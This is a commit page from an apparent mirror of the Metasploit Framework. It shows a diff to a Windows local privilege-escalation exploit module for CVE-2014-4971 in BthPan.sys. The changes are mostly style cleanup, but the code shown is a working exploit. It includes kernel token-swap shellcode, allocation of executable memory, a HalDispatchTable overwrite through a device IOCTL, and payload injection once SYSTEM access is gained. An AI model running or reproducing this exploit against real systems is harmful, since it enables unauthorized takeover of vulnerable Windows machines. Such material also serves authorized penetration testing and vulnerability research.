infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge in changes from @todb-r7.

bug/bundler_fix
Jay Smith 2014-08-14 17:22:07 -04:00
parent 042278ed6a
commit b55f425ec0
No known key found for this signature in database
GPG Key ID: A10634475C298DBB
1 changed files with 34 additions and 38 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

72
modules/exploits/windows/local/bthpan.rb
View File

@ -14,12 +14,13 @@ class Metasploit3 < Msf::Exploit::Local
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
def initialize(info={})
super(update_info(info, {
'Name' => 'BthPan.sys Privilege Escalation',
def initialize(info = {})
super(update_info(info,
'Name' => 'Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation',
'Description' => %q{
A vulnerability within BthPan module allows an attacker to inject memory they control
into an arbitrary location they define. This can be used by an attacker to overwrite
A vulnerability within Microsoft Bluetooth Personal Area Networking module,
BthPan.sys, can allow an attacker to inject memory controlled by the attacker
into an arbitrary location. This can be used by an attacker to overwrite
HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
NtQueryIntervalProfile.
},
@ -34,26 +35,25 @@ class Metasploit3 < Msf::Exploit::Local
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'EXITFUNC' => 'thread'
},
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Windows XP SP3', { } ],
[ 'Automatic', {} ],
[ 'Windows XP SP3', {} ]
],
'References' =>
[
[ 'CVE', 'CVE-2014-4971' ],
[ 'CVE', '2014-4971' ],
[ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt' ]
],
'DisclosureDate'=> 'Jul 18 2014',
'DefaultTarget' => 0
}))
'DisclosureDate' => 'Jul 18 2014',
'DefaultTarget' => 0
))
end
def add_railgun_functions
session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
session.railgun.add_dll('psapi') unless session.railgun.dlls.keys.include?('psapi')
session.railgun.add_function(
'psapi',
'EnumDeviceDrivers',
@ -75,7 +75,6 @@ class Metasploit3 < Msf::Exploit::Local
end
def open_device(dev)
invalid_handle_value = 0xFFFFFFFF
r = session.railgun.kernel32.CreateFileA(dev, "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
@ -84,24 +83,28 @@ class Metasploit3 < Msf::Exploit::Local
if handle == invalid_handle_value
return nil
else
return handle
end
return handle
end
# @return [Array, nil] the address and driver name or nil
# if the driver name of 'krnl' isn't found
def find_sys_base
results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
addresses = results['lpImageBase'][0, results['lpcbNeeded']].unpack("V*")
driver_array = nil
addresses.each do |address|
results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
current_drvname = results['lpBaseName'][0, results['return']]
if current_drvname.downcase.include?('krnl')
return [address, current_drvname]
driver_array = [address, current_drvname]
break
end
end
return nil
return driver_array
end
def ring0_shellcode
@ -118,14 +121,12 @@ class Metasploit3 < Msf::Exploit::Local
tokenswap << "\x39\x98\x84\x00\x00\x00"
tokenswap << "\x75\xED\x89\xB8\xC8"
tokenswap << "\x00\x00\x00\x61\xC3"
return tokenswap
end
def fill_memory(proc, address, length, content)
result = session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
if not proc.memory.writable?(address)
unless proc.memory.writable?(address)
vprint_error("Failed to allocate memory")
return nil
end
@ -147,7 +148,7 @@ class Metasploit3 < Msf::Exploit::Local
vprint_status("Getting the Kernel module name...")
kernel_info = find_sys_base
if kernel_info.nil?
unless kernel_info
vprint_error("Failed to disclose the Kernel module name")
return nil
end
@ -180,19 +181,16 @@ class Metasploit3 < Msf::Exploit::Local
def check
add_railgun_functions
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
if sysinfo["Architecture"] =~ /wow64/i || sysinfo["Architecture"] =~ /x64/
return Exploit::CheckCode::Safe
end
os = sysinfo["OS"]
unless (os =~ /windows xp.*service pack 3/i)
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Safe unless os =~ /windows xp.*service pack 3/i
handle = open_device("\\\\.\\bthpan")
if handle.nil?
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Safe unless handle
session.railgun.kernel32.CloseHandle(handle)
return Exploit::CheckCode::Vulnerable
@ -239,26 +237,24 @@ class Metasploit3 < Msf::Exploit::Local
print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
ioctl = session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x0012d814, 0x1, 0x258, @addresses["halDispatchTable"] + 0x4, 0)
session.railgun.kernel32.CloseHandle(handle)
print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
result = session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
print_status("Checking privileges after exploitation...")
if not is_system?
unless is_system?
fail_with(Failure::Unknown, "The privilege escalation wasn't successful")
end
print_good("Privilege escalation successful!")
p = payload.encoded
print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
if !execute_shellcode(p)
print_status("Injecting #{p.length} bytes to memory and executing it...")
unless execute_shellcode(p)
fail_with(Failure::Unknown, "Error while executing the payload")
end
end
end